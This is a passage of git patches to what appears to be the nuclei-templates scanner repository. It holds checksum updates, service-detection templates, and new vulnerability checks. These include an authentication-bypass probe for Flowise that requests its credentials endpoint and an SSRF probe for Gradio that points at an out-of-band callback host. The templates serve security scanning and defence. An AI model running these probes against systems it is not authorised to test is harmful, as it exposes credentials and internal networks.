network/c2/xtremerat-trojan.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/network/c2/xtremerat-trojan.yaml b/network/c2/xtremerat-trojan.yaml index 7a315de265..dc51d18180 100644 --- a/network/c2/xtremerat-trojan.yaml +++ b/network/c2/xtremerat-trojan.yaml @@ -25,8 +25,7 @@ tcp: read-size: 1024 matchers: - - type: word - encoding: hex - words: - - "58" + - type: regex + regex: + - "^X$" # digest: 4a0a0047304502206fa95ec595a2933ca08a0326dbce0d411afd01de4b65c0c060b9d1317264e96e022100a648393498fd3a99b1aec95f74372fc476d2e484933f438b68468bc6efa642d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a0b508662cc2762edfdd5c405dc020bfb0b5c111 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 23 Apr 2024 21:11:49 +0530 Subject: [PATCH 0329/1768] Update CVE-2023-4568.yaml - fix query --- http/cves/2023/CVE-2023-4568.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 0bf2bf566e..499e44aa06 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: papercut product: papercut_ng - shodan-query: html:"content="PaperCut"" + shodan-query: html:"content=\"PaperCut\"" tags: cve2023,cve,unauth,papercut http: @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee5ada48a3dd406ae7018f21602051a17a932e804c07e4ccce39b100785650b6022100bcffae90accdde9bd822c98681bfe4d53eda75f993855cdf552fa3ca9519dc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee5ada48a3dd406ae7018f21602051a17a932e804c07e4ccce39b100785650b6022100bcffae90accdde9bd822c98681bfe4d53eda75f993855cdf552fa3ca9519dc22:922c64590222798bb761d5b6d8e72950 From d16b06524352156244152c45795eceb4d854d7ff Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 15:42:36 +0000 Subject: [PATCH 0331/1768] Auto Generated Templates Checksum [Tue Apr 23 15:42:36 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92aca2859e..2316573d43 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3155,7 +3155,7 @@ http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf -http/cves/2023/CVE-2023-4568.yaml:ac29d0a7a3e2214d9787a1d7faaee8ed2ff12d06 +http/cves/2023/CVE-2023-4568.yaml:769e387de408503ac5b6cf5430591c12d9f3207a http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 @@ -3174,7 +3174,7 @@ http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 -http/cves/2023/CVE-2023-4973.yaml:a84e7b26530a270f2e44cc242e3bff3beac10515 +http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664 http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f @@ -8442,7 +8442,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9e52b8977efbdbcc3e3186160d8b8f7e3da7be06 +templates-checksum.txt:5e4aebc55256df1ee295a0035e40a3e9c720db1b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cabc89d81c790aa31458c52d7780c7139158cb78 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 23 Apr 2024 21:13:10 +0530 Subject: [PATCH 0332/1768] Update CVE-2023-39143.yaml - fix query --- http/cves/2023/CVE-2023-39143.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index da1a548cb8..b9f8a49d8d 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: papercut product: papercut_mf - shodan-query: html:"content="PaperCut"" + shodan-query: html:"content=\"PaperCut\"" tags: cve2023,cve,lfi,papercut http: @@ -44,4 +44,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4a0a0047304502203e4d4a1e68563a0ade9ad94f1623d780a44134066c6c9cec0763cd4c3cd63f0f022100b34545c47beaf43bd77fd5894b890c154740d5b91d8aa85439c0f9c1d80f5ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e4d4a1e68563a0ade9ad94f1623d780a44134066c6c9cec0763cd4c3cd63f0f022100b34545c47beaf43bd77fd5894b890c154740d5b91d8aa85439c0f9c1d80f5ff2:922c64590222798bb761d5b6d8e72950 From 3a0367d2ae7cf4a58e74d391edd8e17458a0b6c5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 15:44:21 +0000 Subject: [PATCH 0333/1768] Auto Template Signing [Tue Apr 23 15:44:21 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4568.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 499e44aa06..e8da8a88ed 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee5ada48a3dd406ae7018f21602051a17a932e804c07e4ccce39b100785650b6022100bcffae90accdde9bd822c98681bfe4d53eda75f993855cdf552fa3ca9519dc22:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022025b4e549e5cbd393beb59ce312d7a29bca8d0ab3b16c64fcf93b2ff8aa4875d0022100bd23ccd1b14160f48ab3c24a399e2817f0d49b50869d7cc20c63a6f9a5c35920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 34787e8fcffedbd10071f4ccff1960a4d4d2b67d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 15:44:31 +0000 Subject: [PATCH 0335/1768] Auto Generated Templates Checksum [Tue Apr 23 15:44:31 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2316573d43..b99c826674 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3107,7 +3107,7 @@ http/cves/2023/CVE-2023-39109.yaml:fa658d913fd94a0c2aa9371b3a48232f299057e0 http/cves/2023/CVE-2023-39110.yaml:438e5a17629cb1800f6c53b4313a9e93c97248ea http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc http/cves/2023/CVE-2023-39141.yaml:bc88d2b87ea3588e113375c468f3110966db9e99 -http/cves/2023/CVE-2023-39143.yaml:abf6dbda9498362c552990739dd48bbb35fce565 +http/cves/2023/CVE-2023-39143.yaml:00e7970025674a084cac8754fbcac9cfce3c8ef3 http/cves/2023/CVE-2023-3936.yaml:7b2e238b1483242fedc77cd468f0c60f05b5ecbb http/cves/2023/CVE-2023-39361.yaml:f28752fc93eaf34fa6ee0d92fd8b41279a894b3f http/cves/2023/CVE-2023-39598.yaml:40946b09a3f8dde729d593ed391d6e45799e8a42 @@ -8442,7 +8442,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e4aebc55256df1ee295a0035e40a3e9c720db1b +templates-checksum.txt:91f97386c62667db0ffc73a9808b3c768b8e059a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f97ec9f6a327e8d1f200c44e8abf498a1e0db6ba Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 15:44:32 +0000 Subject: [PATCH 0336/1768] Auto Generated cves.json [Tue Apr 23 15:44:32 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 737df67c5d..ef44383c58 100644 --- a/cves.json +++ b/cves.json @@ -2280,6 +2280,7 @@ {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} +{"ID":"CVE-2023-4973","Info":{"Name":"Academy LMS 6.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4973.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 4003692003..4312f16a7c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -821dd44c3f6aa64d48b4c78506dd0928 +68cd88caf661d15462a3281cef4bfe7a From 19c19cb54b78990d25098212c2d11b2b3d4d3f15 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:29:04 +0200 Subject: [PATCH 0337/1768] Add files via upload --- network/detection/aix-websm-detect.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 network/detection/aix-websm-detect.yaml diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml new file mode 100644 index 0000000000..f0cb6e9872 --- /dev/null +++ b/network/detection/aix-websm-detect.yaml @@ -0,0 +1,31 @@ +id: aix-websm-detect + +info: + name: AIX WebSM - Detect + author: righettod + severity: info + description: Detects IBM AIX Web-based System Manager services. + reference: + - https://en.wikipedia.org/wiki/IBM_Web-based_System_Manager + - https://www.filibeto.org/unix/aix/lib/rel/5.2/wsmadmn.pdf + metadata: + max-request: 1 + verified: true + tags: network,aix,detect + +tcp: + - inputs: + - data: "en_US\r\n" + + host: + - "{{Hostname}}" + port: 9090 + read-size: 4096 + + matchers: + - type: word + part: data + words: + - "/var/websm/" + - "startNewWServer" + - "WServer.HANDSHAKING" \ No newline at end of file From c5329b62148ade05bf283f28f20d82f1b55d760e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 23 Apr 2024 23:51:52 +0530 Subject: [PATCH 0338/1768] Create CVE-2024-31621.yaml --- http/cves/2024/CVE-2024-31621.yaml | 35 ++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31621.yaml diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml new file mode 100644 index 0000000000..7797078cfd --- /dev/null +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -0,0 +1,35 @@ +id: CVE-2024-31621 + +info: + name: Flowise 1.6.5 - Authentication Bypass + author: DhiyaneshDK + severity: high + description: | + The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. + reference: + - https://www.exploit-db.com/exploits/52001 + - https://github.com/FlowiseAI/Flowise/releases + - https://flowiseai.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-2051052918 + tags: cve,cve2024,auth-bypass,flowise + +requests: + - method: GET + path: + - "{{BaseURL}}/API/V1/credentials" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"credentialName":' + - '"updatedDate":' + condition: and + + - type: status + status: + - 200 From 94276d79b2a1b1bd278bf08245a8246f0e0cd5e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 18:59:37 +0000 Subject: [PATCH 0339/1768] Auto Generated New Template Addition List [Tue Apr 23 18:59:37 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf616b3c8d..8224af0bc3 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-2948.yaml http/cves/2023/CVE-2023-2949.yaml http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-4973.yaml +http/cves/2024/CVE-2024-31621.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From 8968fc3625e97c95d968bca4687859ab4d74414b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 18:59:44 +0000 Subject: [PATCH 0340/1768] Auto Generated Templates Checksum [Tue Apr 23 18:59:44 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b99c826674..9ff6358a5b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:bf2dd3082903ea2749fe2ff89768d7f662de7004 -cves.json-checksum.txt:f7534eadff910c0718fb4875220000c349ee4793 +cves.json:e72fb91b5adc5da27531f0e0b5cb2b5f20a27465 +cves.json-checksum.txt:ed4104bf38fb14d9b7118a910e28f2d908757626 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3155,7 +3155,7 @@ http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf -http/cves/2023/CVE-2023-4568.yaml:769e387de408503ac5b6cf5430591c12d9f3207a +http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 @@ -3248,6 +3248,7 @@ http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc +http/cves/2024/CVE-2024-31621.yaml:debfdc08e3b9d9a5e9dbf495147dfe7624f2f164 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -8442,7 +8443,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:91f97386c62667db0ffc73a9808b3c768b8e059a +templates-checksum.txt:1b24ff91e51c4702ead52f0da5c97da18e4e41bc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9e68f7bf9b3ae4068e0a2e2defe7746c64b54d79 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 19:00:21 +0000 Subject: [PATCH 0341/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ae1df7187b..9b06568a60 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' + - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From b131eb7a132f737ed2754e17466a1bc6592884b3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 19:01:26 +0000 Subject: [PATCH 0342/1768] Auto Template Signing [Tue Apr 23 19:01:26 UTC 2024] :robot: --- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2024/CVE-2024-31621.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index b9f8a49d8d..62af18ad92 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -44,4 +44,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4a0a0047304502203e4d4a1e68563a0ade9ad94f1623d780a44134066c6c9cec0763cd4c3cd63f0f022100b34545c47beaf43bd77fd5894b890c154740d5b91d8aa85439c0f9c1d80f5ff2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6b50e3324b68352bd5bfe29633a9db388f1c831c218c8a4e23106a478bc6b7002210099ac0e1d64eae74b2664fccf7eff0e8c2cc9e5cd862c7b3e5abb81755c90e381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 7797078cfd..7df09d52bf 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -33,3 +33,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7bf7051f241d839f30159ca9919b87528a7702b6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Wed, 24 Apr 2024 08:07:25 +0200 Subject: [PATCH 0343/1768] Add files via upload --- .../bluecoat-telnet-proxy-detect.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 network/detection/bluecoat-telnet-proxy-detect.yaml diff --git a/network/detection/bluecoat-telnet-proxy-detect.yaml b/network/detection/bluecoat-telnet-proxy-detect.yaml new file mode 100644 index 0000000000..a604a26946 --- /dev/null +++ b/network/detection/bluecoat-telnet-proxy-detect.yaml @@ -0,0 +1,31 @@ +id: bluecoat-telnet-proxy + +info: + name: Blue Coat telnet proxy - Detect + author: righettod + severity: info + description: Detects Blue Coat telnet proxy services. + reference: + - https://en.wikipedia.org/wiki/Blue_Coat_Systems + - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3/about-ssl-proxy.html + - https://techdocs.broadcom.com/us/en/symantec-security-software/web-and-network-security/edge-swg/7-3.html + metadata: + max-request: 1 + verified: true + tags: network,bluecoat,detect + +tcp: + - inputs: + - data: "\r\n" + read: 1024 + + host: + - "{{Hostname}}" + port: 23 + read-size: 4096 + + matchers: + - type: word + part: data + words: + - "Blue Coat telnet proxy" \ No newline at end of file From 7a8b9e42c229f121fa99504eed6523361fcaf6c9 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Wed, 24 Apr 2024 13:27:00 +0200 Subject: [PATCH 0344/1768] Enhance detection --- network/detection/aix-websm-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/aix-websm-detect.yaml b/network/detection/aix-websm-detect.yaml index f0cb6e9872..8bdd140648 100644 --- a/network/detection/aix-websm-detect.yaml +++ b/network/detection/aix-websm-detect.yaml @@ -16,6 +16,7 @@ info: tcp: - inputs: - data: "en_US\r\n" + read: 1024 host: - "{{Hostname}}" @@ -28,4 +29,4 @@ tcp: words: - "/var/websm/" - "startNewWServer" - - "WServer.HANDSHAKING" \ No newline at end of file + - "WServer.HANDSHAKING" From 43f519eb1ca8904f48bab4b5529fcd2e17076342 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 24 Apr 2024 18:10:10 +0530 Subject: [PATCH 0345/1768] Create CVE-2024-1183.yaml --- http/cves/2024/CVE-2024-1183.yaml | 35 +++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1183.yaml diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml new file mode 100644 index 0000000000..3507b85c1b --- /dev/null +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -0,0 +1,35 @@ +id: CVE-2024-1183 + +info: + name: Gradio - Server Side Request Forgery (SSRF) + author: DhiyaneshDK + severity: medium + description: | + An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response. + reference: + - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4 + - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-1183 + cwe-id: CWE-601 + epss-score: 0.00061 + epss-percentile: 0.24702 + metadata: + verified: true + max-request: 1 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,ssrf,oast,gradio + +http: + - raw: + - | + GET /file=http://oast.pro HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + part: header From 9bc83788978724169019787cb2a907fe5c18dbf8 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 24 Apr 2024 19:38:40 +0530 Subject: [PATCH 0346/1768] Create kevs.yml --- profiles/kev.yml | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 profiles/kev.yml diff --git a/profiles/kev.yml b/profiles/kev.yml new file mode 100644 index 0000000000..81814ad0bd --- /dev/null +++ b/profiles/kev.yml @@ -0,0 +1,9 @@ +# This is a configuration file for the osint template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'config' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a config profile: +# nuclei -config config/osint.yml -list target_list_to_scan.txt + +tags: + - kev From fa711a55603c5401b80d0bcebbeab210bcca5de8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 24 Apr 2024 19:46:20 +0530 Subject: [PATCH 0347/1768] Update kev.yml --- profiles/kev.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/profiles/kev.yml b/profiles/kev.yml index 81814ad0bd..be8ba21ca3 